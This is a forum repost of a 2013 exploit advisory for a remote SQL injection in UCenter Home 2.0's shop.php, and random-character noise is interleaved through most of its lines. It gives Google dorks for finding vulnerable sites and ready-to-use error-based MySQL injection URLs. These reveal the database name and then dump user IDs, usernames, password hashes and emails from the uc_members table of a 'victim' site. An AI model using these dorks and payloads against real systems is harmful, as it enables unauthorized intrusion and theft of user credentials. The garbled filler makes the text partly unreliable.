1 S) ^0 \0 [& z; z1 A0 p0 \__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ % D# l# w8 N' Z% n/ t
?( f0 d4 @$ H3 G; W1 V+ ?
- S* j8 }) v& f' w: z' f3 J
% z0 k. t5 _4 w*/ Author : KnocKout
m* [) ?2 V7 l( [) [ c
3 a# d( m4 ^# k1 n# h0 y*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
* r1 H" R- J' x6 S$ p& J; r: W Y+ K) t! m
*/ Contact: knockoutr@msn.com
2 Q3 f6 g) b) G6 O& `2 p; \ G R( I" l( r
*/ Cyber-Warrior.org/CWKnocKout
# n* }+ E/ {4 u+ Y
5 A: b; Y9 q1 n5 M6 a8 c__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ; Z% k7 @% A% w1 z0 L& Q, W# B
9 a! g8 S" A8 R
Script : UCenter Home ! o8 X. V6 t. h( }$ h/ ?% i
; M* i6 _7 @* q* [
Version : 2.0 6 z, A f7 R F# O; _/ e; }
% d" W& z. o, c) W+ m; zScript HomePage : http://u.discuz.net/
5 c n& w2 n9 D$ k
/ ?+ h* p$ a }1 R" [__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 1 I' j, `/ U. N5 M* d, ]
# }+ ]+ C% ~, Q `# V. j" {: T
Dork : Powered by UCenter inurl:shop.php?ac=view 7 p# _, \4 q2 T; U" `8 S+ F: n% h. y
( i, N& q# q, ]0 g
Dork 2 : inurl:shop.php?ac=view&shopid= ; y+ X( N& d; t6 W
$ U1 s9 f( l; I4 t) z6 J/ N( d4 J6 u
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== " l+ Y* N" o5 G" f
7 Q5 n: @: ~0 Y
Vuln file : Shop.php
# P! O0 h, e& Q6 U7 _) `. U. z7 [1 R# L2 m9 L, X
value's : (?)ac=view&shopid= * h' l- R$ |) X" Y: T' K
, m' a- z6 w2 M( n
Vulnerable Style : SQL Injection (MySQL Error Based)
; H' E# x1 g' U0 j
' ]; v. m3 i$ N) N! i! C. \Need Metarials : Hex Conversion % j* ^) x9 n. B' U- y7 @, ^+ O
1 U: t8 W* U% K0 W$ Q8 \__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- Y% u9 b0 M- V r& P8 c( a- `/ f0 S% Z) g5 o' ?8 p
Your Need victim Database name.
+ I7 [( C+ X. d( e: h
8 S4 u- z1 f3 u* P3 A/ Ufor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 9 l# s4 E+ k$ U4 a! L ?, b
- a& |' @+ j+ ]5 E+ [3 \+ j..
0 k8 p/ n/ E2 l: V( C$ p
% _/ b1 A, B7 X5 zDB : Okey. V: n4 y; y9 V) Q7 R1 A
! N4 \: G) ~4 q' O! j
your edit DB `[TARGET DB NAME]` " d* [0 S5 L4 s7 p
; M0 H" k. D! s3 {: IExample : 'hiwir1_ucenter' . a" X" Z+ W: G' Q/ E+ r
& ]8 `) n5 T8 p) Y) r/ P
Edit : Okey. 9 o" |# u5 h+ c- b/ P
( F2 I6 ^" D! F% ^+ }Your use Hex conversion. And edit Your SQL Injection Exploit..
) q8 A& h! d( d& E/ e7 F9 T5 B5 H3 A" ?% ^
* P- I3 l8 _+ f D9 w- f- W5 q2 X
8 T' b9 x9 ^9 c9 d0 L. A7 bExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 4 K% \" U9 Z) y5 L2 e
|
发表于 2013-2-27 21:31:31
收藏
支持
反对